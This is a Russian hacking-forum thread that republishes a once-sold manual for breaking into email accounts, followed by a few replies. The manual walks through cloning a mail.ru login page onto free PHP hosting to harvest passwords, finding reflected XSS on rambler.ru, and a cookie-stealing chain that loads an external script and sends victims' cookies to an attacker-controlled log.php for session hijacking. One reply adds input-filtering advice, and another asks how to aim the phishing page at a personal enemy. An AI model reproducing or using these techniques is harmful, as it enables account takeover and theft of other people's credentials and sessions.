![]() |
Несколько способов взлома e-mail аккаунтов
Несколько способов взлома e-mail аккаунтов Всем привет! Данный мануал я написал давно уже (около полгода назад) и в то время продавал новичкам с целью обучения. Сейчас я выкладываю его в паблик, так как уже давно хотел сделать это. Нужно отменить, что те, кто имели дело с темой взлома емейлов с помощью фейков и XSS-уязвимостей не найдут для себя ничего нового. Текст на 99% написан мной. Также кто то из моих покупателей пару месяцев назад выложил неполную версию текста, приняв за свой, здесь, на ачате, но позже по моей просьбе его удалили. Пример XSS-уязвимости рассматриваемый в мануале сейчас уже не актуальный (с тех пор прошло много времени), поэтому вы сможете только представить себе, как все работало раньше. Копия мануала в Word-формате: Код:
link: http://depositfiles.com/files/om6id6goy(c) Chrome~ |
Здравствуйте! Я Chrome~. Сегодня я опишу Вам несколько способов того, как производится взлом e-mail, и как себя защитить от взлома. Я уверен, что на различных сайтах и форумах Вы видели, что люди рекламируют свои услуги взлома всяческих аккаунов. Это могут быть и почтовые аккаунты, и страницы социальных сетей, и игровые персонажи и самые разнообразные учетные записи на других сайтах. Хочется также заметить, что довольно часто мы видим в форумах такие темы и сообщения, как “Помогите взломать e-mail девушки” и т.п.
Как происходит вскрытие почты? Для начала я скажу, что есть несколько способов сделать это:
Для начала я объясню Вам, что такое cookies. Cookies (кукисы) — это специальные переменные, которые устанавливаются браузером, при получении специальной команды от сервера, для определенного сайта, который Вы когда-то посетили. Они сохраняются в пользователя на компьютере. Давайте посетим какой-нибудь сайт. К примеру, http://google.com. Открыли? Теперь в адресной строке, в этом самом окне наберите такой JavaScript код: Код:
javascript:document.cookieЯ написал Вам основную информацию о том, какие способы взлома аккаунтов существуют. Теперь я Вам детально попытаюсь объяснить, как работает, и как реализуются первый и второй способа вскрытия (взлом с помощью фейков и взлом с помощью XSS уязвимостей). |
1. Взлом почты с помощью фейков
В этом разделе я расскажу, как взломать почту с помощью фейков. Для начала, нам нужно зарегистрировать бесплатный хостинг с поддержкой PHP. В данном примере, я использую http://hostland.su. Регистрация займет у Вас всего пару минут, и еще после регистрации пару минут придется подождать, пока на Вашу почту придет письмо для подтверждения регистрации. После этого можно приступать. Сначала я расскажу Вам, как делаются фейки. Давайте сделаем фейк для популярного почтовика http://mail.ru. (Будем использовать браузер Mozilla Firefox 3) Открываем ссылку http://win.mail.ru/cgi-bin/login, так как именно она есть страницей авторизации. Жмем правую кнопку на теле документа. В контекстном меню выбираем опцию “Исходный код страницы”. Выделяем весь код страницы, копируем в буфер обмена, и вставляем в любой текстовый редактор (Скажем, Блокнот). Далее, мы будем работать только с текстом в окне редактора. Для начала ищем слово “Войти”, потому что в нашем случае именно так подписана кнопка авторизации. Нашли? Теперь посмотрите на часть кода, которая находиться между тегами <form> и </form>, и которая включает в себе найденный нами фрагмент “Войти”. Данная часть исходного кода страницы отвечает за отправку данных, введенных в форму на сайт. Вот, как она у меня выглядит: Код:
<form method="post" action="auth" onSubmit="return CheckForm(this);">Код:
<form method="post" action="auth" onSubmit="return CheckForm(this);">Код:
<form method="post" action="auth" onSubmit="return CheckForm(this);">Код:
<form method="post" action="log.php" onSubmit="return CheckForm(this);">Давайте приступим к написанию скриптов. Напишем log.php с таким содержимым: PHP код:
Код:
<input type="text" name="Login" value="" class=w_100></td>Напишем код для файла base.php: PHP код:
Теперь нужно залить наши файлы на хост. Для этого можно воспользоваться программой Total Comander. Я также хочу заметить, что для загрузки файлов на FTP сервер можно воспользоваться и другими программами. После того, как Вы подтвердили регистрацию на сайте http://hostland.su (и вообще на любом другом сайте, который предоставляет бесплатные хостинги), Вам должны были прислать письмо, в котором написаны все данные для доступа к новому аккаунту. Данные для доступа по FTP выглядят примерно так: host: ftp.tu2.ru user: username password: password Как использовать эти данные? Очень просто! Я покажу Вам это на примере работы с Total Comander. Другие программы настраиваются по такому же принципу. Для начала запускаем Total Comander. Вызываем команду FTP => Соединится с FTP сервером… Теперь нажимаем кнопку “Добавить”, вписываем нужные данные, и жмем “ОК”. После того, как Вы все правильно сделаете, выполните команду FTP => Соединится с FTP сервером…, выберете только что созданное Вами подключение и нажмите копку “Соединится”. Заливать файлы на хост также просто, как и копировать их на локальный диск. В письме от поставщика услуг (в данном случае — http://hostland.su), должно быть написано, куда можно закачивать файлы. В нашем случае, файлы можно заливать в папку /htdocs/www. Загрузим все заранее подготовлены нами файлы (index.htm, log.php, base.php) в эту папку. Сделали? Теперь откройте любой интернет браузер и перейдите по адресу Вашего сайта. Фейк работает. Введите произвольные значения полей “Логин” и “Пароль” и нажмите кнопку “Войти”. Нужно заметить, что после этого браузер перейдет по адресу http://win.mail.ru/cgi-bin/login, а именно его мы указывали в файле log.php. Теперь из своего хоста загрузите на компьютер файл base.php и откройте его в любом текстовом редакторе. Если появилась новая запись в которой есть точно введенные Ваши данные — значит, поздравляю, Вы все сделали правильно! |
2. Взлом почты с помощью XSS-уязвимостей
В этом разделе я расскажу, как взломать почту с помощью XSS уязвимостей. Что такое XSS уязвимость? Аббревиатура XSS расшифровывается как Сross Site Sсriрting (“межсайтовый скриптинг”). Принято его называть именно XSS, а не СSS, так как СSS введена намного раньше, и означает она Сasсading Style Sheets – «каскадные таблицы стилей» (применяются в оформлении HTML-станиц). Сross – это «крест», поэтому первая буква в «межсайтовом скриптинге» заменена именно на «X». XSS – это уязвимость на сервере, позволяющая внедрить в генерируемую скриптами на сервере HTML-страницу произвольный код путём передачи его в качестве значения нефильтруемой переменной. Под «нефильтруемой» переменной подразумевается переменная, которая перед её использованием в скрипте (например, PHP) не проверяется на наличие запретных символов, таких, как: <,>,’,” и многих других. РOST-запрос передаёт переменные через массив, неотображаемый в адресной строке браузера; GET-запрос обнаруживает себя в адресной строке следующим образом: http://www.somesite.com/index.php?fi...cond=2&third=3 Тут http://www.somesite.com/index.php — некая страница, к которой мы обращаемся, а first=1&second=2&third=3 — это переменные, передаваемые скрипту. В GET-запросе переменные записываются следующим образом: имя_переменной_1=значение_п ременной_1&имя_переменной_2= значение_переменной_2&…&имя _переменной_n=значение_пере енной_n То есть для наглядности примера, запишем еще один GET-запрос: http://www.somesite.com/index.php?им...менной_n PHP-скрипт может генерировать html-страницу, в которой выводит значение одной из переданных переменных без всякой фильтрации. НО! Если Вы, составляя GET-запрос, вместо обычного значения переменной подставит какие-нибудь ключевые тэги (например, <sсriрt> или <br>), то они выполнятся интерпретатором! XSS-уязвимости используются в большинстве случаев для кражи кукисов (сookies в большинстве случаев хранят сессию, присвоив себе которую, можно быть на сайте под чужим аккаунтом. Также они хранят зашифрованный пароль, расшифровав который, можно завладеть аккаунтом). Но XSS-баги не ограничиваются кражей сookies. Что же позволяют осуществить XSS-уязвимости? 1) Кражу конфиденциальной информации посетителя. 2) Всё, что умеют СGI-, РERL-, PHP-, ASР-скрипты. 3) Непредусмотренные стандартом возможности браузера. (Благодаря уязвимостям в самых браузерах) В следующем примере я буду использовать браузер Internet Explorer 7. (В этой части статьи будет множество всяких ссылок; эти ссылки нужно вводить либо вручную, либо копировать в буфер обмена и вставлять в браузер; никак иначе я не советую, потому что CTRL + клик по ссылке может не правильно отобразить страницу) Рассмотрим сайт http://rambler.ru . Воспользуемся поиском сайта. Введем произвольный поисковый запрос, например, “Hollywood” и нажмем кнопку “Найти!”. В результате поисковик выдаст множество сайтов, но внимание мы обратим на адрес страницы в браузере. (Внимание! На момент написания статьи данная XSS-уязвимость работала. Но на момент модифицирования её закрыли. В цели обучения я привожу новую XSS-сигнатуру: http://ftpsearch.rambler.ru/db/ftpsearch/search.html?words=XSS&ftype=5"><script>alert('XSS' )</script>&form=0&hu=1&what=0) В меня она выглядит вот так: http://nova.rambler.ru/search?btnG=%D0%9D%D0%B0%D0%B9%D1%82%D0%B8!&query= Hollywood Теперь договоримся, что для поиска XSS-уязвимостей будем использовать следующий JavaScript код: Код:
<script>alert("XSS")</script>Rambler: поиск по Интернету. '<script>alert("XSS")</script>' — Windows Internet Explorer Давайте посмотрим исходный код страницы, в котором найдем первое совпадение со строчкой “<script>alert("XSS")</script>”, то есть строчкой, которую мы ввели в качестве поискового запроса. Нашли? Она должна находиться между HTML тэгами <title> и </title>, которые и отвечают за текст заголовка окна браузера. У меня все это выглядит вот так: Код:
<title>Rambler: поиск по Интернету. '<script>alert("XSS")</script>'</title>Код:
<title>Rambler: поиск по Интернету. '</title><script>alert("XSS")</script>'Код:
</title><script>alert("XSS")</script>Неплохо, правда? Снова смотрим на адрес страницы. Так он выглядит у меня: http://nova.rambler.ru/search?btnG=%...3C%2Fscript%3E Тут переменная query содержит необходимый нам поисковый запрос, то есть строку “</title><script>alert("XSS")</script>” в зашифрованном виде. Помните, как первый раз мы ввели строку “Hollywood” в качестве поискового запроса? Тогда адрес страницы выглядел так: http://nova.rambler.ru/search?btnG=%...uery=Hollywood Видим, что query=Hollywood, что и подтверждает мои слова. Перейдем по ссылке: http://nova.rambler.ru/search?btnG=%...XSS")</script> И снова видим окошко с текстом “XSS”. Давайте попробуем “опустить” переменную btnG, то есть просто удалим её из адреса страницы, и посмотрим, будет ли работать скрипт. Откроем ссылку: http://nova.rambler.ru/search?query=...XSS")</script> Работает! Только что мы с Вами вывели XSS-уязвимость в сайте www.rambler.ru. Она присутствует потому, что не происходит фильтрации спецсимволов, и мы можем закрыть тэг <title>, что бы выполнился наш код. |
3. Использование XSS-уязвимостей
Как же использовать XSS-уязвимости? Выше я написал, что XSS-уязвимости чаще всего используются для того, что бы получить cookies жертвы. Давайте с помощью найденной уязвимости на Рамблере, подсмотрим наши кукисы. Для этого выполните следующий JavaScript код: (код document.cookie возвращает cookies сайта) Код:
<script>alert(document.cookie)</script>http://nova.rambler.ru/search?query=...okie)</script> Мы видим непонятный текст в окошке сообщения. Этот текст и есть наши cookies! Как я раньше писал, они выводятся в формате имя=значение и разделяются “;”. А что будет, если мы получим кукисы жертвы? Давайте представим такой случай: жертва зашла в свою почту на Рамблере, читает входящие письма. Тут она видит Ваше сообщение, в котором Вы пишете, что нашли прикольный сайт! Заходи! Она переходит по Вашей ссылке… и действительно попадает на какой то сайт. На самом же деле, кукисы уже в нас. Теперь достаточно зайти под браузером, который разрешает редактировать кукисы (например, Opera), и подставить кукисы жертвы, вместо своих. После этого нужно нажать кнопку “Обновить”, — и мы увидим почту жертвы вместо своей. Как подставить чужие cookies вместо своих в Opera? Очень просто! Достаточно выполнить команду Инструменты => Настройки… и во вкладке “Дополнительно” выбрать пункт “Cookies”. Теперь, в окошке, что появится, выбираем соответствующие имена кукисов, жмем кнопку “Изменить” и заменяем их соответствующими значениями. Можете провести эксперимент: зарегистрируйте два почтовых аккаунта на одном и том же почтовом сервере, посмотрите кукисы одного из них и сохраните во временном текстовом файле. Теперь зайдите под вторым аккаунтом, отредактируйте новые кукисы старимы значениями из текстового файла, и нажмите “Обновить”. Мы снова окажемся в первом аккаунте. Как можно реализовать то, что бы при переходе по ссылке мы получали кукисы того, кто перешел? Очень просто. Помните, как мы учились делать с Вами фейк? Вот теперь нужно создать те же 3 файла, только с немного другим содержимым. Файл base.php должен быть точно таким, как и при создании фейка, а вот код для файла log.php придется переписать немного: PHP код:
Как же нам отправить GET-запрос с кукисами на наш скрипт? Тут нету совсем ничего сложного!!! Создадим файл js.js с таким содержимым: Код:
var concat = function()Код:
a = "http://www.your_site.com/log.php?";Последняя строка Код:
location.href = concat(a, b);Теперь нам нужно сделать файл index.htm с таким содержимым: Код:
<html>Все 4 файла (index.htm, js.js, log.php, base.php) мы должны залить в одну директорию нашего хостинга. При переходе по нашей ссылке http://your_site.com и при условии, что все эти файлы будут в корневом мы получим cookies жертвы к сайту http://rambler.ru. Если Вы хотите, что бы файлы не находились в корневом каталоге Вашего сайта, то нужно будет немного изменить код (вместо http://your_site.com прописать полную ссылку к файлу). И последнее, на чем я хотел бы сконцентрировать Ваше внимание, это скрипт Код:
<script>location.href="http://nova.rambler.ru/search?query=</title><SCRIPT type="text/javascript" src="http://your_site.com/js.js"></SCRIPT>"<script>Код:
<SCRIPT type="text/javascript" src="http://your_site.com/js.js"></SCRIPT>Код:
<SCRIPT type="text/javascript" src="полный адрес кода"></SCRIPT> |
4. Виды XSS-уязвимостей
Есть 2 виды XSS-уязвимостей: 1) Пассивные 2) Активные К этому времени мы использовали пассивную XSS-уязвимость. Пассивные XSS-уязвимости не сохраняются на сервере, они срабатывают тогда, когда пользователь сделает некоторое дополнительное действие, например, кликнет по нашей специально сформированной ссылке. То есть их срабатывание требует некоторого действия от пользователя, и автоматически они не загружаются и не выполняются в браузере. Активные XSS-уязвимости сохраняются на сервере и не требуют действия от пользователя. Они выполняются при переходе на некоторую страницу зараженного сайта. Как можно добиться такого эффекта? Для примера расскажу Вам активную XSS-уязвимость в он-лайн игре http://combats.ru, котрая была очень давно, и с которой я ознакомился в некоторой статье, но на мое время она уже не работала. Уязвимость заключался в том, что нефильтровались символы в поле "Домашняя страница". Человек мог написать здесь любой скрипт, который выполниться при просмотре его анкеты. Автор статьи сделал скрипт, который загружался, если человек открывший его страницу с информацией героя, хотя бы на долю мгновения пошевелит мышкой по ней. Все кукисы отправлялись автору на сервер, и он мог войти под любым героем, который посмотрел его анкету. Добиться просмотра анкеты было не сложно — достаточно было всего-навсего подать заявку на бой… 5. Как защитить свой почтовый аккаунт? Во-первых: никогда не открывайте подозрительные ссылки! Во-вторых, не читайте открытки от неизвестных Вам людей. Чаще всего в сообщениях, в которых говорится о том, что на Ваше имя пришла открытка, есть ссылка на фейковую страницу, которая сначала возьмет необходимые данные, а потом сделает редирект на страницу с открыткой, либо еще куда-то. С Вами был Chrome~. Спасибо, что проявили интерес к моему материалу. Всего Вам наилучшего! Внимание! Содержимое данной статьи предоставляется исключительно для ознакомительных целей! Автор не несет никакой ответственности за Ваши действия и за последствия от Ваших действий. |
Лично я ничего нового для себя не узнал. Автор собрал материал из разных статей в одну. Есть кусок статьи с асечки. Для новичков будет полезным прочитать эту статью.
|
Нет, я не собирал данный мануал из частей. Текст полностью мой. Кстати, на асечке я нашел копию данного материала, правда неполную, так же, как на ачате. Админам асечки я не писал.
Вот ссылка на тему от этого плагиатора: http://forum.asechka.ru/showthread.php?t=109194 Ссылка на тему, в которой раньше велась продажа: http://forum.antichat.ru/showthread.php?t=96688 (чтобы у вас не возникало сомнений) |
выше упоминалась информация как защитить свой ящик, хочу добавить как защитить свой ресурс от xss,
чаще всего xss встречаются в гостевой книге(я так заметил) из-за недостаточной фильтрации входящих данных вот небольшой прример скрипта который фильтрует входящие данные: PHP код:
Или вот попроще способ и даже можно сказать лучше,сам пользуюсь,потому как посетители часто оставляют сообщения с символами: ">,+,",:" ит.д. тогда предыдущий способ выдаст им "XSS" , на античате сообщения фильтруются таким же способом: PHP код:
|
Здравствуйте, уважаемые!
Сразу оговорюсь, что я не хаккер, не кодер и пр. и вообще мало в этом разбираюсь. Но! достал меня один г....н и ничего не остается делать, как попытаться "успокоить" его. Но ближе к сути вопроса: По способу №1 (фейковая страница авторизации). Насколько я понял, способ может сработать не только на мыле, а на любой страничке авторизации пользователя? Так вот, ткните носом, куда подставить адрес моего скрипта "log.php" в данном коде? PHP код:
|
| Время: 19:53 |